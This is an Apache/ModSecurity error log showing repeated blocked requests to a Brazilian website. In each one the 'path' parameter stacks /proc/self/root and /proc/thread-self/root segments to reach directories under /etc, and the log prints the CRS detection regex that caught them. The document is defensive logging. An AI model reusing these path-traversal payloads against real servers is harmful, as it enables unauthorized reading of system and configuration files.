[Fri Mar 20 06:29:38.786848 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:49386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TgvHIg5MgXLBnicPnYwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:40.194784 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:49402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ThDJ3M9BSuKP7CAYFUgAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:41.515404 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.241.31:49406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ThTJ3M9BSuKP7CAYFVgAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:41.666011 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:41568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ThV1pVZ5mVmJwsFMd5QAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:29:42.899168 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.241.31:49408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ThvHIg5MgXLBnicPnZAAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:44.084000 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:49410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TiNa6ubjKNq_cu4bApgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:46.242767 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:56292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TiV1pVZ5mVmJwsFMd6wAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:29:46.243074 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:49416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TifqxLDW4GITHUkTTCwAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:47.647498 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:34352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TiwF0L0L-SsrnPo5VsgAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:48.952975 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:34366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TjAF0L0L-SsrnPo5VtAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:50.252223 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:34374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TjhCii7xarUs8iHZWOwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:51.389228 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.241.31:34382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tj7ninkcc-iUj5ApMhwAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:52.657850 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:34396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TkNa6ubjKNq_cu4bArgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:59.517622 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:34398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TlzJ3M9BSuKP7CAYFcwAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:00.866894 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.241.31:34900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TmF1pVZ5mVmJwsFMd9wAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:30.156433 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:56306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TtvXLqtnMIWvjpaKIOwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:31.243019 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:34900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tt11pVZ5mVmJwsFMeIQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:32.799421 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:39440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TuNa6ubjKNq_cu4bA2AAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:34.120247 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:39448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TuvqxLDW4GITHUkTTKwAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:34.831565 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:41350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TuvqxLDW4GITHUkTTLAAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:30:37.182785 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:41358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TvfXLqtnMIWvjpaKIQAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
